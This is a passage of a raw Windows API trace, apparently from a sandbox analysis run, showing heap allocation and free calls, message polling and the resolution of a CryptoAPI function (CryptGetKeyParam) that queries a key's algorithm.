[0098.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0098.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0098.535] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0098.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0098.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0098.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0098.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.536] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0098.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0098.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0098.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0098.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0098.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0098.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0098.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0098.537] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0098.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0098.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0098.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0098.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0098.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0098.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0098.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0098.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0098.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0098.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0098.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0098.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0098.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0098.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0098.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0098.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0098.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0098.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0098.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0098.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0098.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0098.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0098.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0098.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0098.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0098.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0098.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0098.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0098.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0098.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0098.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0098.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0098.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0098.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0098.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0098.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0098.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0098.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0098.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0098.540] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0098.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0098.542] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0098.542] CryptGetKeyParam (in: hKey=0x41ac6c0, dwParam=0x7, pbData=0x43e2750, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2750*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0098.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0098.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0098.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0098.544] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0098.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0098.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0098.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0098.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0098.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0098.545] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0098.588] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0098.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0098.588] HeapFree (in: 